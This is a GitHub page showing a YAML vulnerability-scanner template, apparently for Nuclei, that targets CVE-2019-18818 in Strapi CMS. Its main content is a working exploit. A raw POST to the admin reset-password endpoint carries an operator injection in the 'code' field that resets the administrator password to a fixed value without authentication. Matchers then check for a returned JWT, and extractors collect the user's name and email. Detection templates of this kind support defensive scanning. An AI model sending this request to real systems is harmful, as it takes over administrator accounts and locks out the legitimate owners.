-
Notifications
You must be signed in to change notification settings - Fork 222
/
Copy pathCVE-2019-18818.yaml
52 lines (45 loc) · 1.37 KB
/
CVE-2019-18818.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
id: CVE-2019-18818
info:
name: Strapi CMS - Admin password reset (Unauthenticated)
author: idealphase
description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
reference:
- https://github.com/advisories/GHSA-6xc2-mj39-q599
- https://www.exploit-db.com/exploits/50239
- https://nvd.nist.gov/vuln/detail/CVE-2019-18818
severity: critical
tags: cve,cve2019,strapi,auth-bypass,intrusive
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2019-18818
cwe-id: CWE-640
requests:
- raw:
- |
POST /admin/auth/reset-password HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
- type: word
condition: and
words:
- '"username":'
- '"email":'
- '"jwt":'
part: body
extractors:
- type: json
json:
- .user.username
- .user.email